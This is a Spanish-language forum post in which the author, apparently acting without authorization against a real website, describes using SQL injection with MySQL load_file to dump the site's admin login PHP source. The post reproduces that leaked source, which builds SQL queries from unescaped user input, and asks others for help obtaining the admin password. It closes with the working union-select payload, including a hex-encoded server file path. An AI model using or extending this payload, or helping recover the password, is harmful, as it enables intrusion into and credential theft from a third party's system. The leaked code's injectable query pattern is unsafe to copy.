Temas

Estaba intenta ingresar una web solo por el afan de aprender xD

Me ayude con un video de youtube...

Pero al cargar el archivo intranetapp/admin/index.php por medio de load_file(...

me manda lo siguiente

Código [Seleccionar] Expandir

// Carga el archivo de definiciones
include_once ('_conexion.php');
$error = "";
setcookie("s_usuarioyo[un]");

if (isset($_POST["user"])){
$query = "select * from usuarios where usuario = '$_POST[user]'";
$result = mysql_query($query, $link);
if (mysql_num_rows($result) == 0) {
$error = "El Usuario No Existe"; }
else {
$rs = mysql_fetch_array($result);
if ($rs["clave"] != md5($HTTP_POST_VARS["pass"])) {
$error = "Password Incorrecto"; }
else {
if ($rs[estado] == '0') {
$error = "Usuario Desactivado"; }
else {
$sql2 = "SELECT max(codigo) as maximo from auditoria";
$results = mysql_query($sql2,$link);
$rs2 = mysql_fetch_array($results);
$nucod=$rs2[maximo]+1;
$nucod=str_pad($nucod,4,"0",STR_PAD_LEFT);
$fechasesion=date("Y/m/d");
$horainicio=date("h:i:s");
$sql2 = "insert into auditoria (codigo,usuario,fecha_sesion,hora_inicio) values ('$nucod','$HTTP_POST_VARS[user]','$fechasesion','$horainicio')";
mysql_query($sql2,$link);

session_start();
setcookie('s_usuarioyo[un]', $HTTP_POST_VARS["user"]);
setcookie('s_usuarioyo[ut]', $rs[tipousuario]);
setcookie('s_usuarioyo[nc]', $nucod);
if ($rs[tipousuario] == 'o') {
header("Location:padron.php");}
else {
header("Location:padron.php");}
}

}
}
}

if ($_GET[salir]!=""){

$horafin=date("h:i:s");
$sql2 = "update auditoria set hora_fin='$horafin' where codigo='$_GET[salir]'";
mysql_query($sql2,$link);

}

?>

se que la tabla de usuario es usuario xd pero la password nose

entonces si me pudieran ayudar xd

Pd: union select 1,2,3,4,load_file(0x433a2f77616d702f7777772f68746d6c312f6172636869766f732f696e7472616e65746170702f61646d696e2f696e6465782e706870),6,7,8,9,0/*